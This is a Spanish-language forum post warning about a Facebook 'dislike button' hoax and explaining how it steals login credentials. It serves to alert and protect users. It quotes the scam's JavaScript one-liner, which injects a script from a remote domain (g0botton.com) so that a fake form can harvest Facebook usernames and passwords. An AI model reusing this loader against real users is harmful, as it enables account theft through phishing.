Hola gente taringera, aqui otro de mis post
En este post les explicare 3 cosas sobre esta gran mentira ↓
1.- Que es?
2.- Que hace/Como funciona?
3.- Para que hicieron esto?(Con que beneficio)
Que es?
Desde ayer circula un hoax (en castellano = bulo) que nos invita a instalar el botón NO ME GUSTA siguiendo unas instrucciones. La ‘maldad’ está friamente calculada en esa pequeña aplicación, la finalidad es robarnos nuestros datos de identificación (usuario/password) de Facebook y enviarlos por medio de un formulario (Survey).
De nuevo se pone en evidencia la seguridad de Facebook, que es prácticamente nula, y se ratifica la plataforma como un magnifico espacio para los cyber-delincuentes. Todo decir que en la mayoría de los casos ayudamos bastante a que así sea, ya que en FaceBook nos encanta contar en voz alta y gratis lo que en otros sitios no haríamos pagando, de todos modos ese no es el tema central de este post.
Les recomiendo, a quienes han intentado seguir las instrucciones y han llegado al último paso, debemos reiniciar nuestra contraseña de Facebook inmediatamente; reconozco que yo ejecuté el script, copiándolo en la barra de navegación (URL y cuando me pidió que me identificara, pensé que era algo muy raro pues ya estaba identificado en FaceBook, es decir, ya tenía una cookie de sesión, por lo que no me cuadraba nada de lo que estaba pasando.
Y por curiosidad, más tarde y con calma, hice un breve análisis de cómo hicieron esta mentira; una vez lo analizas te das cuenta de lo estupido y de la intención maliciosa que se esconde detrás de toda esta mentira. Pero aún así, la mayoría de la gente solemos intentar instalarlo si vemos que un contacto nuestro lo ha hecho, sin hacer una reflexión más profunda. También es algo curioso...
LA CURIOSIDAD MATO AL GATO.
Que hace?/Como funciona?
1.-Cuando le damos clic al enlace ‘instalar NO ME GUSTA’ nos redirige a esta página: javascript:void(0) URL fuera de la plataforma de Facebook. WHOIS nos dice algo sobre este dominio...
Registrant:
Gomez Homero
donlikeboton.com, office #3391116
c/o OwO, BP80157
59053, Roubaix Cedex 1
FR
+33.899701761
[email protected]
2.- Una vez llegados a este punto, lo normal, es que sigamos confiados que vamos a instalar el botón (además las ansias nos pueden y solemos querer terminar rápido-), por lo tanto, habremos pulsado el enlace que nos lleva a esta página ↓
3.- Bien, lo que haremos será darle al botón copiar (según el paso 3) y copiaremos en nuestro portapapeles este código:
{_ccscr=document.createElement(‘script’);_ccscr.type=’text/javascript’;_ccscr.src=’http://g0botton.com/nomegusta.js?’+(Math.random());document.getElementsByTagName(‘head’)[0].appendChild(_ccscr);})();
4.- Lo que hacemos al copiar ese código en nuestro navegador es acceder a g0botton.com (dominio registrado por la misma persona) y cargar el script/documento nomegusta.js
5.- ¿Qué contiene nomegusta.js? Vamos a verlo , sobretodo observen la línea que pide que te identifiques para completar la instalación (en realidad es para que inconscientemente les demos nuestros datos de facebook directamente en su formulario) y otra línea envia esos mismos datos. Para rematar la jugada después de todo nos envia a otro sitio llamado http://track.users2cash.com … mediante un refresh en el código de redirige_promo.php
Bien, lejos de seguir discutiendo sobre el código o aspectos de seguridad en las plataformas de Redes Sociales, eso cada cual que saque sus conclusiones, te recomiendo que cambies tu contraseña de Facebook si has sido de los que has intentando instalar el "Boton NO ME GUSTA’, y que esto nos sirva como aprendizaje
Saludos !